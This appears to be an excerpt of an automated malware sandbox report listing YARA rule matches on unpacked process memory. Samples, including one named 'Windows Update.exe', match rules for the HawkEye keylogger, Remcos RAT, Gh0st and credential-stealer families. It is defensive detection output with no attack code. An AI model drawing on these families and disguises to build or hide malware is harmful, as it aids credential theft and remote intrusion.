                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.1.Windows Update.exe.41b460.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 32.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.388b065.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.1.xxTzyGLZx5.exe.4031bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.1.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.4970000.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 34.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.1.5.exe.41b460.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.76b0000.20.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 37.2.5.exe.148f0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 13.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b9fa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 18.0.remcos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.48e6408.13.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4a27428.10.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147ba62f.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.49cfa72.18.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 43.2.Windows Update.exe.147a0000.4.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.14909265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.0.Windows Update.exe.415058.14.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.4b40000.16.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 37.2.5.exe.14901458.4.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 1.2.xxTzyGLZx5.exe.147a21bf.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 43.2.Windows Update.exe.147b9265.2.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 2.0.xxTzyGLZx5.exe.4031bf.9.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.0.5.exe.415058.15.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.4857428.8.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 1.2.xxTzyGLZx5.exe.147a0000.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 40.2.5.exe.415058.3.raw.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 44.2.Windows Update.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Hawkeye author = JPCERT/CC Incident Response Group, description = detect HawkEye in memory, rule_usage = memory scan, reference = internal research
                    Source: 4.0.rem9090sta.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 44.0.Windows Update.exe.400000.13.unpack, type: UNPACKEDPEMatched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
